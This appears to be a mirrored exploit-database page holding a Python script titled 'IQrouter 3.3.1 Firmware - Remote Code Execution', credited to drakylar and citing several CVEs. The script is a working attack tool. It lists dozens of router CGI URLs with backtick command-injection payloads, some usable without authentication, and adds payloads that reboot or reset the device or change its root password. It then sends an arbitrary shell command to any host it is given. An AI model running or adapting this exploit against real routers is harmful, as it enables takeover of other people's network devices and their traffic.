iqrouter 3.3.1 firmware remote code execution

▸▸▸ Exploit & Vulnerability >>   webapps exploit & hardware vulnerability




Online Vulnerability Scanner Tools
iqrouter 3.3.1 firmware remote code execution Code Code... 
				
# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A 

#!/usr/bin/env python3
import argparse
from sys import argv, exit

try:
    import requests
except ImportError:
    print("Install requests lib! pip3 install requests")


print("""
#######################################################################
#           IQrouter multiple RCE and other vulnerabilities           #
#                   by drakylar (Shaposhnikov Ilya)                   #
#            CVE-2020-11963 CVE-2020-11964 CVE-2020-11966             #
#                    CVE-2020-11967 CVE-2020-11968                    #
#######################################################################
""")


rce_setup = [
    [
        "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
        "RCE /vlanTag (vlan_tag param)"
    ],
    [
        "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
        "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
        "RCE /screen9 (s2 param)"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
        "RCE /screen9 (s1 param)"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
        "RCE /screen9 (p2 param)"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
        "RCE /screen9 (p1 param)"
    ],
    [
        "/cgi-bin/luci/er/screen4?save_isp='`{}`",
        "RCE /screen4 (save_isp param)"
    ],
    [
        "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
        "RCE /screen2 set_wan_modem_interfaces param)"
    ],
    [
        "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
        "RCE /screen2 find_ip_address_conflict param)"
    ],
    [
        "/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
        "RCE /screen10 (set_security_question param)"
    ],
    [
        "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
        "RCE /screen10 (set_security_answer param)"],
    [
        "/cgi-bin/luci/er/screen1?zonename='`{}`'",
        "RCE /screen1 (zonename param)"
    ],
    [
        "/cgi-bin/luci/er/register?email=`{}`",
        "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
    ]
]

rce_any = [
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
        "RCE /wifi (s2 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
        "RCE /wifi (s1 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
        "RCE /wifi (p2 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
        "RCE /wifi (p1 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
        "RCE /wifi (guestwifi_5g_ssid param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
        "RCE /wifi (guestwifi_2g_ssid param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
        "RCE /wifi (guest_key param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
        "RCE /wifi (enable_guestwifi param)"
    ],
    [
        "/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123",
        "RCE /screen11.1 (email param)"
    ],
    [
        "/cgi-bin/luci/er/reboot_link?link='`{}`'",
        "RCE /reboot_link (link param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
        "RCE /diag_wifi (htm5ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
        "RCE /diag_wifi (htm2ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
        "RCE /diag_wifi (c5ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
        "RCE /diag_wifi (c2ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
        "RCE /diag_set_static_wan (static_ip param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
        "RCE /diag_set_static_wan (net_mask param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
        "RCE /diag_set_static_wan (gateway param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
        "RCE /diag_set_static_wan (dns param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
        "RCE /diag_set_static_modem (static_ip param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
        "RCE /diag_set_static_modem (net_mask param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
        "RCE /diag_set_static_modem (gateway param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
        "RCE /diag_set_device_name_and_sync (device_name param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
        "RCE /diag_set_device_name (device_name param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
        "RCE /diag_pppoe_update (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
        "RCE /diag_pppoe_update (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
        "RCE /diag_pppoe (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
        "RCE /diag_pppoe (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
        "RCE /diag_pppoa_update (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
        "RCE /diag_pppoa_update (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
        "RCE /diag_pppoa (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
        "RCE /diag_pppoa (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/advanced_link?link='`{}`'",
        "RCE /advanced_link (link param)"
    ]

]

advanced_payloads = [
    [
        "/cgi-bin/luci/er/reboot_link?reboot=1",
        "Reboot IQrouter (/reboot_link reboot param))"
    ],
    [
        "/cgi-bin/luci/er/screen2?reboot=1",
        "Reboot IQrouter (/screen2 reboot param))"
    ],
    [
        "/cgi-bin/luci/er/index?reset_config=1",
        "Reset IQrouter (/index reset_config param)"
    ],
    [
        "/cgi-bin/luci/er/screen7?upgrade=1",
        "Upgrade IQrouter (/screen7 upgrade param)"
    ],
    [
        "/cgi-bin/luci/er/vlanTag?restart_network=1",
        "Restart network (/vlanTag restart_network param)"
    ],
    [
        "/cgi-bin/luci/er/diag_iperf_cmd/start",
        "Start iperf script (/diag_iperf_cmd/start)"
    ],
    [
        "/cgi-bin/luci/er/diag_iperf_cmd/stop",
        "Stop iperf script (/diag_iperf_cmd/stop)"
    ],
    [
        "/cgi-bin/luci/er/get_syslog",
        "Router setup info log (/get_syslog)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
        "Change root password to c00lpasswd (can change in code)"
    ],
    [
        "/cgi-bin/luci/er/reset_password/",
        "Change root password to 'changeme' (static)"
    ]
]


def print_payloads():
    print('#' * 30)
    print("Payloads list")
    num = 1
    print('#########################  RCE without auth  ########################')
    for payload in rce_any:
        print("{} - {}".format(num, payload[1]))
        num += 1

    print(
        '###############  RCE (router need to be in setup mode)  ###############')
    for payload in rce_setup:
        print("{} - {}".format(num, payload[1]))
        num += 1

    print(
        '#########################  Advanced payloads  #########################')
    for payload in advanced_payloads:
        print("{} - {}".format(num, payload[1]))
        num += 1


parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
                    default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
                    default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
                    default="http", type=str)

args = parser.parse_args()


def main():
    print("")
    full_payload_list = rce_setup + rce_any + advanced_payloads
    payloads_amount = len(full_payload_list)
    try:
        hostname = args.host
        port = args.port
        payload_num = int(args.num)
        bash_cmd = args.cmd
        protocol = args.protocol

        if payload_num < 1 or payload_num > payloads_amount:
            print("Error with payload number!")
            raise IndexError
        if port < 0 or port > 65535:
            print("Error with port number")
            raise IndexError
        if protocol not in ['http', 'https']:
            print("Error with protocol name")
            raise IndexError

        current_payload = full_payload_list[payload_num - 1]
        print("Payload: {}".format(current_payload[1]))
        print("Host: {}".format(hostname))
        print("Port: {}".format(port))
        print("Protocol: {}".format(protocol))
        print("Command: {}".format(bash_cmd))

        full_url = "{}://{}:{}{}".format(protocol, hostname, port,
                                         current_payload[0].format(bash_cmd))
        print("Built URL: {}".format(full_url))

        r = requests.get(full_url)
        print("Status code: {}".format(r.status_code))
        return
    except IndexError:
        parser.print_help()
        print_payloads()
        exit(1)


if __name__ == '__main__':
    print(
        "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
    exit(main())

Iqrouter 3.3.1 firmware remote code execution Vulnerability / Exploit Source : Iqrouter 3.3.1 firmware remote code execution



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.